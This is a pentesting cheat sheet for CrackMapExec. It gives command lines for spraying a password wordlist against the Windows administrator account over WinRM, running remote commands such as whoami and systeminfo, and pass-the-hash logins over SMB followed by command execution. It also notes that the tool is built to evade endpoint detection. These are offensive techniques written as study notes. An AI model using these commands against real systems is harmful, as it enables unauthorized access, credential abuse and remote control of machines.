====== CrackMapExec (CME) ======
**CrackMapExec:** "A swiss army knife for pentesting networks..."
* CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
* Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
* See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
**Supported Protocols:** WinRM, MSSQL, SMB, SSH
For help and syntax, just issue the command: ''crackmapexec'' or...
crackmapexec -h
crackmapexec winrm -h # (for help specific to the winrm protocol)
crackmapexec smb -h # (for help specific to the smb protocol)
**General Syntax:**
crackmapexec -u username -p password
**Examples:**
crackmapexec -u username -p 'Admin!123@' # or...
crackmapexec -u='username' -p='Admin!123@'
===== CME & WinRM =====
**Syntax:**
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
You can use the ''-u'' switch to specify a file of possible user names to try.
* But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first).
* You should get a green "**[+]**" if successful.
Look over the output (from the top down):
* First line: you can see it actually connects to WinRM.
* NOTE: wsman is an implementation of WinRM: windows management.
**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
You should get some happy feedback along with the results of your command execution.
* ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.
===== CME & Pass-the-Hash =====
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
This should indicated whether or not it works.
* If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system...
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
It should give you visual feedback about the command execution. And there you go. Execute what you want.
----